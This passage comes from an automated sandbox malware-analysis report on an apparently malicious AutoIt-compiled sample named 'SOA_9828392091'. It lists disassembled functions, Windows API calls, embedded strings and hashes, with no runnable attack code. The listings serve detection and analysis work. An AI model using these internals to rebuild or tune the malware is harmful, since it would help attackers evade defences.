                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: Exception@8Throwstd::exception::exception
                                      • String ID:
                                      • API String ID: 3728558374-0
                                      • Opcode ID: 9b0c4bc862cb8fb8e3d0c7865a2eec508c36f9e4afd3a1e72aab79d4cc8f3959
                                      • Instruction ID: a44d35141a5f4849d20351c9b19a018e77c20bf8a6547118126d6f8e733fa248
                                      • Opcode Fuzzy Hash: 9b0c4bc862cb8fb8e3d0c7865a2eec508c36f9e4afd3a1e72aab79d4cc8f3959
                                      • Instruction Fuzzy Hash: 53028070A00209DBDF18DF68D991AAEB7B9FF85300F108469E806DB295EB35DE15CF91
                                      Function 009502A4 Relevance: .3, Instructions: 345COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 6bcf19402166b509fafb4c50a64371ef2a93877f8d810bfc08732e8a9195a1a8
                                      • Instruction ID: 6df879a16433ae711900fec9119f07404877a8f77be01ec317a3fca9791e61b6
                                      • Opcode Fuzzy Hash: 6bcf19402166b509fafb4c50a64371ef2a93877f8d810bfc08732e8a9195a1a8
                                      • Instruction Fuzzy Hash: 77C173322055930AEF2D863A847493FBAA55EE17B371A076DD8B2CB5D5FF20C528D720
                                      Function 009506D9 Relevance: .3, Instructions: 341COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 2d76c3bdd49f8e00aad6e71f29a941d673537f809e9b181fbd8d4251c6dfdf40
                                      • Instruction ID: 32d399d098c032d2b3359462352cdaa4bf4954ee185165bf12a2cd9101d7ca63
                                      • Opcode Fuzzy Hash: 2d76c3bdd49f8e00aad6e71f29a941d673537f809e9b181fbd8d4251c6dfdf40
                                      • Instruction Fuzzy Hash: 70C1A53220559309EF2D863AC43493FBAA55AE27B331A076DD8B2CB5D5EF20D528D720
                                      Function 0094FA57 Relevance: .3, Instructions: 323COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                      • Instruction ID: a45e17e969f3015647ad1c99991ed09fadd3656587cb5d7dccf38df2e893addf
                                      • Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                      • Instruction Fuzzy Hash: 15C1943220549309EF2D4639C474D3FBBA59AA2BB631A077DD8B3CB5D5EF20C564D620
                                      Function 018BAA98 Relevance: .1, Instructions: 92COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125350713.00000000018B7000.00000040.00000020.00020000.00000000.sdmp, Offset: 018B7000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_18b7000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                                      • Instruction ID: 590ae7da820046e14bfea266d0336ae12b3ae5ef365e42fda01bf24aa71a6119
                                      • Opcode Fuzzy Hash: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                                      • Instruction Fuzzy Hash: 7741D371D1051CEBCF48CFADC991AEEBBF2AF88201F548299D516AB345D730AB41DB90
                                      Function 018BA988 Relevance: .0, Instructions: 35COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125350713.00000000018B7000.00000040.00000020.00020000.00000000.sdmp, Offset: 018B7000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_18b7000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                                      • Instruction ID: 7891c017d3d9d3190d35b550c7e695ff1555a890f447cb1a966b572264eb55c0
                                      • Opcode Fuzzy Hash: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                                      • Instruction Fuzzy Hash: FE019D78A00209EFCB48DF98C5909AEF7B5FB48310F208699E819E7701D730AE52DB80
                                      Function 018BA928 Relevance: .0, Instructions: 35COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125350713.00000000018B7000.00000040.00000020.00020000.00000000.sdmp, Offset: 018B7000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_18b7000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                                      • Instruction ID: c2790d8bd34d088e9bfb37264af99ee668890feb6fc9a28bb7eb9f76344bcb70
                                      • Opcode Fuzzy Hash: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                                      • Instruction Fuzzy Hash: C5014D79A11209EFCB48DF98C5909AEF7B5FF48310F208599E819E7745D731AE41DB80
                                      Function 018B92F8 Relevance: .0, Instructions: 6COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125350713.00000000018B7000.00000040.00000020.00020000.00000000.sdmp, Offset: 018B7000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_18b7000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                                      • Instruction ID: 2052e7d0eb43af8a57a5c2d707c06396f1b84aee57587abda472ed480d51124b
                                      • Opcode Fuzzy Hash: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                                      • Instruction Fuzzy Hash: 1AB012310527488BC2118B89E008B1073ECA308E04F1000B0D40C07B01827874008D48
                                      Function 0098A2A9 Relevance: 77.5, APIs: 40, Strings: 4, Instructions: 490filecommemoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • DeleteObject.GDI32(00000000), ref: 0098A2FE
                                      • DeleteObject.GDI32(00000000), ref: 0098A310
                                      • DestroyWindow.USER32 ref: 0098A31E
                                      • GetDesktopWindow.USER32 ref: 0098A338
                                      • GetWindowRect.USER32(00000000), ref: 0098A33F
                                      • SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 0098A480
                                      • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 0098A490
                                      • CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0098A4D8
                                      • GetClientRect.USER32(00000000,?), ref: 0098A4E4
                                      • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 0098A51E
                                      • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0098A540
                                      • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0098A553
                                      • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0098A55E
                                      • GlobalLock.KERNEL32(00000000), ref: 0098A567
                                      • ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0098A576
                                      • GlobalUnlock.KERNEL32(00000000), ref: 0098A57F
                                      • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0098A586
                                      • GlobalFree.KERNEL32(00000000), ref: 0098A591
                                      • CreateStreamOnHGlobal.COMBASE(00000000,00000001,88C00000), ref: 0098A5A3
                                      • OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,009BD9BC,00000000), ref: 0098A5B9
                                      • GlobalFree.KERNEL32(00000000), ref: 0098A5C9
                                      • CopyImage.USER32(000001F4,00000000,00000000,00000000,00002000), ref: 0098A5EF
                                      • SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 0098A60E
                                      • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0098A630
                                      • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0098A81D
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                      • String ID: $AutoIt v3$DISPLAY$static
                                      • API String ID: 2211948467-2373415609
                                      • Opcode ID: cf3a43706a3e2377bfe9fd22b5a314b7019b34fffdc7037a92320176328cc9ea
                                      • Instruction ID: db53404384b847ed1ca9b06a157e0e58b471cac22e4dc0d4a93ae1897674da6b
                                      • Opcode Fuzzy Hash: cf3a43706a3e2377bfe9fd22b5a314b7019b34fffdc7037a92320176328cc9ea
                                      • Instruction Fuzzy Hash: CE029D71910209EFDB14DFA4CD89EAE7BB9FB48310F048219F915AB2A0DB70AD41DF60
                                      Function 0099D285 Relevance: 49.8, APIs: 33, Instructions: 260COMMON
                                      Download Yara Rule
                                      APIs
                                      • SetTextColor.GDI32(?,00000000), ref: 0099D2DB
                                      • GetSysColorBrush.USER32(0000000F), ref: 0099D30C
                                      • GetSysColor.USER32(0000000F), ref: 0099D318
                                      • SetBkColor.GDI32(?,000000FF), ref: 0099D332
                                      • SelectObject.GDI32(?,00000000), ref: 0099D341
                                      • InflateRect.USER32(?,000000FF,000000FF), ref: 0099D36C
                                      • GetSysColor.USER32(00000010), ref: 0099D374
                                      • CreateSolidBrush.GDI32(00000000), ref: 0099D37B
                                      • FrameRect.USER32(?,?,00000000), ref: 0099D38A
                                      • DeleteObject.GDI32(00000000), ref: 0099D391
                                      • InflateRect.USER32(?,000000FE,000000FE), ref: 0099D3DC
                                      • FillRect.USER32(?,?,00000000), ref: 0099D40E
                                      • GetWindowLongW.USER32(?,000000F0), ref: 0099D439
                                        • Part of subcall function 0099D575: GetSysColor.USER32(00000012), ref: 0099D5AE
                                        • Part of subcall function 0099D575: SetTextColor.GDI32(?,?), ref: 0099D5B2
                                        • Part of subcall function 0099D575: GetSysColorBrush.USER32(0000000F), ref: 0099D5C8
                                        • Part of subcall function 0099D575: GetSysColor.USER32(0000000F), ref: 0099D5D3
                                        • Part of subcall function 0099D575: GetSysColor.USER32(00000011), ref: 0099D5F0
                                        • Part of subcall function 0099D575: CreatePen.GDI32(00000000,00000001,00743C00), ref: 0099D5FE
                                        • Part of subcall function 0099D575: SelectObject.GDI32(?,00000000), ref: 0099D60F
                                        • Part of subcall function 0099D575: SetBkColor.GDI32(?,00000000), ref: 0099D618
                                        • Part of subcall function 0099D575: SelectObject.GDI32(?,?), ref: 0099D625
                                        • Part of subcall function 0099D575: InflateRect.USER32(?,000000FF,000000FF), ref: 0099D644
                                        • Part of subcall function 0099D575: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0099D65B
                                        • Part of subcall function 0099D575: GetWindowLongW.USER32(00000000,000000F0), ref: 0099D670
                                        • Part of subcall function 0099D575: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0099D698
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameMessageRoundSendSolid
                                      • String ID:
                                      • API String ID: 3521893082-0
                                      • Opcode ID: 0f851c674478f810829f8e0b4ea6f1d19f0de00cdcc1b6a45a393473604ef3f1
                                      • Instruction ID: a82c2721aa58de0863ceb3a1783f0fa4a7e782655da88fe9deb95d51dc7e1c96
                                      • Opcode Fuzzy Hash: 0f851c674478f810829f8e0b4ea6f1d19f0de00cdcc1b6a45a393473604ef3f1
                                      • Instruction Fuzzy Hash: 27918C7100E301BFDB109F68DD48A6ABBA9FF89335F100B19F962961E0E771D944DB92
                                      Function 0097DBC4 Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 187COMMON
                                      Download Yara Rule
                                      APIs
                                      • SetErrorMode.KERNEL32(00000001), ref: 0097DBD6
                                      • GetDriveTypeW.KERNEL32(?,009CDC54,?,\\.\,009CDC00), ref: 0097DCC3
                                      • SetErrorMode.KERNEL32(00000000,009CDC54,?,\\.\,009CDC00), ref: 0097DE29
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: ErrorMode$DriveType
                                      • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                      • API String ID: 2907320926-4222207086
                                      • Opcode ID: 039ef878f02530bc9b1e13fafbcd4afe42726ec52cc4debda40e47e61b8b3b22
                                      • Instruction ID: f4b7116062ebdc51c37672bf4caed7dae24634de22803de184b86f1939a37600
                                      • Opcode Fuzzy Hash: 039ef878f02530bc9b1e13fafbcd4afe42726ec52cc4debda40e47e61b8b3b22
                                      • Instruction Fuzzy Hash: A051E232209742AB8321DF11CA86A39B7B0FFD4308F28D919F46B9B6D1DB60DD45DB42
                                      Function 0093CC24 Relevance: 44.0, APIs: 12, Strings: 13, Instructions: 267COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: __wcsnicmp
                                      • String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                      • API String ID: 1038674560-86951937
                                      • Opcode ID: ef95e31636fca0e808a19e85f27ed7956be82baf86355fdc511922c536b815f5
                                      • Instruction ID: fbac96408e4324fa3e7dc9fa63d98e14e6d44fc4788367eb03608ce60dbd53c8
                                      • Opcode Fuzzy Hash: ef95e31636fca0e808a19e85f27ed7956be82baf86355fdc511922c536b815f5
                                      • Instruction Fuzzy Hash: 8C81F7B1640605BBCB25AB64DC82FBB777CAF96304F044439F906BA1C2EB60D945CBD1
                                      Function 0099C6E9 Relevance: 42.4, APIs: 23, Strings: 1, Instructions: 447windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013,?,?,?), ref: 0099C788
                                      • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 0099C83E
                                      • SendMessageW.USER32(?,00001102,00000002,?), ref: 0099C859
                                      • SendMessageW.USER32(?,000000F1,?,00000000), ref: 0099CB15
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: MessageSend$Window
                                      • String ID: 0
                                      • API String ID: 2326795674-4108050209
                                      • Opcode ID: cce04c225cc6d8cc180cec63abb7823e6f982b604ac28b181eac40d277935c04
                                      • Instruction ID: ccd03cfee3b5aa9e7e4858a5c42c5b7cb1678e0b481d5be1ffc49ed0299c7972
                                      • Opcode Fuzzy Hash: cce04c225cc6d8cc180cec63abb7823e6f982b604ac28b181eac40d277935c04
                                      • Instruction Fuzzy Hash: 5DF1E6B1509301AFEB218F2CCC45BAABBE8FF49354F080A2DF599D62A1D774D940DB91
                                      Function 0099638D Relevance: 42.4, APIs: 1, Strings: 23, Instructions: 352COMMON
                                      Download Yara Rule
                                      APIs
                                      • CharUpperBuffW.USER32(?,?,009CDC00), ref: 00996449
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: BuffCharUpper
                                      • String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
                                      • API String ID: 3964851224-45149045
                                      • Opcode ID: 9191ced86f28146b296069c62e08399fbbe53f6a7e7c01bb3e8ecbe43c7f215e
                                      • Instruction ID: b3cd57f538e19f2877273effd4b31347fbe3882d7b1f49091ce2bc4c89c0033e
                                      • Opcode Fuzzy Hash: 9191ced86f28146b296069c62e08399fbbe53f6a7e7c01bb3e8ecbe43c7f215e
                                      • Instruction Fuzzy Hash: 42C17D306043458BCF14EF58C591FAE77E5BFD5344F044869F8869B2A2EB25ED4ACB82
                                      Function 0099D575 Relevance: 39.2, APIs: 26, Instructions: 186windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetSysColor.USER32(00000012), ref: 0099D5AE
                                      • SetTextColor.GDI32(?,?), ref: 0099D5B2
                                      • GetSysColorBrush.USER32(0000000F), ref: 0099D5C8
                                      • GetSysColor.USER32(0000000F), ref: 0099D5D3
                                      • CreateSolidBrush.GDI32(?), ref: 0099D5D8
                                      • GetSysColor.USER32(00000011), ref: 0099D5F0
                                      • CreatePen.GDI32(00000000,00000001,00743C00), ref: 0099D5FE
                                      • SelectObject.GDI32(?,00000000), ref: 0099D60F
                                      • SetBkColor.GDI32(?,00000000), ref: 0099D618
                                      • SelectObject.GDI32(?,?), ref: 0099D625
                                      • InflateRect.USER32(?,000000FF,000000FF), ref: 0099D644
                                      • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0099D65B
                                      • GetWindowLongW.USER32(00000000,000000F0), ref: 0099D670
                                      • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0099D698
                                      • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0099D6BF
                                      • InflateRect.USER32(?,000000FD,000000FD), ref: 0099D6DD
                                      • DrawFocusRect.USER32(?,?), ref: 0099D6E8
                                      • GetSysColor.USER32(00000011), ref: 0099D6F6
                                      • SetTextColor.GDI32(?,00000000), ref: 0099D6FE
                                      • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 0099D712
                                      • SelectObject.GDI32(?,0099D2A5), ref: 0099D729
                                      • DeleteObject.GDI32(?), ref: 0099D734
                                      • SelectObject.GDI32(?,?), ref: 0099D73A
                                      • DeleteObject.GDI32(?), ref: 0099D73F
                                      • SetTextColor.GDI32(?,?), ref: 0099D745
                                      • SetBkColor.GDI32(?,?), ref: 0099D74F
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                      • String ID:
                                      • API String ID: 1996641542-0
                                      • Opcode ID: 8b4c827f27f5004bf26345838d09d7c8e9c405d67971867e434319e111ad0479
